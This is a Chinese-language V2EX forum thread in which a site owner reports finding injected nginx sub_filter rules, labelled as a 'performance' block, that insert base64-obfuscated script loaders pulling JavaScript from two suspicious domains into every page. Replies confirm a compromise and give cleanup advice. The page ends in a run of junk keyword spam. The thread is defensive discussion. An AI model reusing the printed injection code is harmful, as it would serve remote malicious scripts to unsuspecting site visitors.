这是网站被入侵了吗? - V2EX
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
请不要在回答技术问题时复制粘贴 AI 生成的内容
daokedao
V2EX    程序员

这是网站被入侵了吗?

  •  
  •   daokedao 9 天前 3643 次点击

    昨天发现 nginx.conf 文件中被加入以下内容:

     sub_filter_types text/html; sub_filter '</head>' '<script>document.cookie="hasVisited178a=1;Max-Age=86400;Path=/";(function(){var hm=document.createElement("script");hm.src=atob("aHR0cHM6Ly9ib290c2NyaXRwLmNvbS9saWIvanF1ZXJ5LzQuNy4yL2pxdWVyeS5taW4uanM=");var s=document.getElementsByTagName("script")[0];s.parentNode.insertBefore(hm,s);})();</script></head>'; sub_filter_once off; # Performance Enhancement Block - DO NOT MODIFY # Nginx Performance Optimization Configuration # Auto-generated by performance tuning module sub_filter_types text/html; sub_filter '</head>' '<script>document.cookie="hasVisited178a=1;Max-Age=86400;Path=/";(function(){var hm=document.createElement("script");hm.src=atob("aHR0cHM6Ly9hLnNvZnN4ei5jb20vanVtcC5qcw==");var s=document.getElementsByTagName("script")[0];s.parentNode.insertBefore(hm,s);})();</script>\n</head>'; sub_filter_once off; # Performance Enhancement Block - DO NOT MODIFY_END 

    不懂这方面,在 google 上搜了搜,没搜到有用内容。问豆包说大概率是恶意脚本服务器(可能用于挖矿、盗号、刷流量、跳转钓鱼网站等)

    aHR0cHM6Ly9ib290c2NyaXRwLmNvbS9saWIvanF1ZXJ5LzQuNy4yL2pxdWVyeS5taW4uanM=

    base64 解码是 https://bootscritp.com/lib/jquery/4.7.2/jquery.min.js

    aHR0cHM6Ly9hLnNvZnN4ei5jb20vanVtcC5qcw==

    base64 解码是 https://a.sofsxz.com/jump.js

    19 条回复    2025-11-27 18:39:52 +08:00
    defunct9
        1
    defunct9  
       9 天前   1
    是的,u r right
    Binini
        2
    Binini  
       9 天前
    就没见过正常程序员用 createElement("script")还特么 atob 一串网址的
    zhmouV2
        3
    zhmouV2  
       9 天前
    谁家好人藏脚本的原始地址啊?
    第一个估计是被修改过的 jq ,应该是对请求做了限制,直接访问还被 cdn 挡住了
    busier
        4
    busier  
       9 天前 via iPhone
    一般网站挂马也就罢了

    这整得 web 服务器挂马
    MFWT
        5
    MFWT  
       9 天前
    不用想,就是挂马,赶紧排查吧
    sparkssssssss     6
    sparkssssssss  
       9 天前
    能直接修改你配置文件的,
    如果用了啥 nginx 的管理面板的,赶紧仍了,
    如果没有,那就更恐怖了,直接被人拿到 shell 了吧
    superfatboy
        7
    superfatboy  
       9 天前   2
    dcdlove
        8
    dcdlove  
       9 天前   1
    不用怀疑,铁定被入侵,并在网站内容和 nginx 中挂马了
    daokedao
        9
    daokedao  
    OP
       9 天前
    @superfatboy #7 感谢,和这篇文章中描述的问题完全一致
    5200
        10
    5200  
       9 天前
    得好好排查一下入侵的方式,他能挂第一次就能挂第二次。
    iceecream
        11
    iceecream  
       9 天前
    文中是 644 ,改成 640 也没啥效果啊
    busier
        12
    busier  
       9 天前 via iPhone
    @iceecream 当然没用 。644 改 640 只是取消 o 的读权限。最多能防止 o 读取文件泄漏配置内容。原文作者根本就搞不清楚这是在操作啥随便一说有用而已。

    况且能修改这个配置文件,肯定是拿到 root 权限的。
    Kirkcong
        13
    Kirkcong  
       9 天前
    删除这段代码以后,问题得到彻底的解,一个问题随之而来:为什么服务器上的 ngnix 的配置文件这么容易被篡改?查看权限才知道为 644 ,改为 640 以后应该不会再有类似的问题了!

    文章中这段有问题啊,4 的权限是读取,改成 0 没什么用啊,而且即便是 777 也得有途径登陆机器才能修改。那么这段恶意代码到底是怎么加入到服务器的 nginx 中的?看到作者展示了“nginx 管理器”的图片,这是不是类似于面板的东西?感觉有可能是通过面板的漏洞进来的。
    Mantext1989
        14
    Mantext1989  
       9 天前 via iPhone
    yulgang
        15
    yulgang  
       9 天前   1
    # Performance Enhancement Block - DO NOT MODIFY
    # Nginx Performance Optimization Configuration
    # Auto-generated by performance tuning module


    就是 Nginx 在转发静态页面时,将</head> 替换成后面那一托,相当于在每个网页里都插入了他的 JS 。

    如果后端启用了 gzip 压缩,Nginx 这里的 sub_filter 就不好使了。

    检查一下 Nginx 这台主机是不是开了不必要的端口,一些高危端口建议在防火墙上做好策略只允许特定 IP 访问 。

    修改密码,清理 $HOME/.ssh/authorized_keys 里你不清楚的设置
    pppan
        16
    pppan  
       9 天前   1
    > 为什么服务器上的 ngnix 的配置文件这么容易被篡改?查看权限才知道为 644 ,改为 640 以后应该不会再有类似的问题了!

    笑死,为什么我家的东西会被偷走?查看才知道原来我家的东西没有固定,用 502 固定以后应该不会再有类似的问题了!
    fucker
        17
    fucker  
       9 天前
    @pppan 和我想一块了,服务器被黑了讨论配置文件的权限干嘛
    fucker
        18
    fucker  
       9 天前
    家里床上被人拉了一坨,那你肯定要看看门窗锁没锁好,墙有没有被人凿开啊



    检查自己服务器开放的服务有没有漏洞吧
    fiveStarLaoliang
        19
    fiveStarLaoliang  
       9 天前
    赶紧重装系统吧,你的系统都被黑了
    关于     帮助文档     自助推广系统     博客     API     FAQ     Solana     2460 人在线   最高记录 6679       Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 22ms UTC 15:29 PVG 23:29 LAX 07:29 JFK 10:29
    Do have faith in what you're doing.
    ubao msn snddm index pchome yahoo rakuten mypaper meadowduck bidyahoo youbao zxmzxm asda bnvcg cvbfg dfscv mmhjk xxddc yybgb zznbn ccubao uaitu acv GXCV ET GDG YH FG BCVB FJFH CBRE CBC GDG ET54 WRWR RWER WREW WRWER RWER SDG EW SF DSFSF fbbs ubao fhd dfg ewr dg df ewwr ewwr et ruyut utut dfg fgd gdfgt etg dfgt dfgd ert4 gd fgg wr 235 wer3 we vsdf sdf gdf ert xcv sdf rwer hfd dfg cvb rwf afb dfh jgh bmn lgh rty gfds cxv xcv xcs vdas fdf fgd cv sdf tert sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf shasha9178 shasha9178 shasha9178 shasha9178 shasha9178 liflif2 liflif2 liflif2 liflif2 liflif2 liblib3 liblib3 liblib3 liblib3 liblib3 zhazha444 zhazha444 zhazha444 zhazha444 zhazha444 dende5 dende denden denden2 denden21 fenfen9 fenf619 fen619 fenfe9 fe619 sdf sdf sdf sdf sdf zhazh90 zhazh0 zhaa50 zha90 zh590 zho zhoz zhozh zhozho zhozho2 lislis lls95 lili95 lils5 liss9 sdf0ty987 sdft876 sdft9876 sdf09876 sd0t9876 sdf0ty98 sdf0976 sdf0ty986 sdf0ty96 sdf0t76 sdf0876 df0ty98 sf0t876 sd0ty76 sdy76 sdf76 sdf0t76 sdf0ty9 sdf0ty98 sdf0ty987 sdf0ty98 sdf6676 sdf876 sd876 sd876 sdf6 sdf6 sdf9876 sdf0t sdf06 sdf0ty9776 sdf0ty9776 sdf0ty76 sdf8876 sdf0t sd6 sdf06 s688876 sd688 sdf86